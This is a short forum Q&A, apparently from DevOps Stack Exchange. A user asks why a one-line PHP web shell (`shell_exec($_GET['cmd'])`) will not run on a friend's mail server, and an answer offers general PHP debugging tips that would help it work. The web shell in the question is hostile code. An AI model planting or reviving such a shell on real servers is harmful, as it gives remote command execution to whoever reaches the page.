# Shell Scripting

Tags: shell-script, php

I am trying to execute a PHP shell script on my friends mail server to show him the impact of such vulnerability. Vulnerable code but unfortunately it doesn't seem to be running.

This is the script I wrote:

```
echo shell_exec($_GET['cmd']);
```

Comment: What is not running? What is the problem you're facing? Please provide more details. And how is this related to DevOps?

Comment: This question doesn't seem to be about [DevOps](https://en.wikipedia.org/wiki/DevOps) and isn't on-topic here. Debugging questions may be on-topic at [Stack Overflow](https://stackoverflow.com/) *if you can include the relevant error message*.

Answer (score 2):

Please provide more information about the method and the result as Husyn asked, it may be more suited to programming SO if it is PHP related. Anyway:

- `<?php` should be present at the start of any PHP script.
- If a PHP error occurs, you might not see it without [error reporting](http://php.net/manual/en/function.error-reporting.php) enabled.
- If the actual shell command fails or outputs warnings, you won't see it with `shell_exec` unless you add the stderr to stdout redirection `2>&` to the command, or use [`exec`](http://php.net/manual/en/function.exec.php).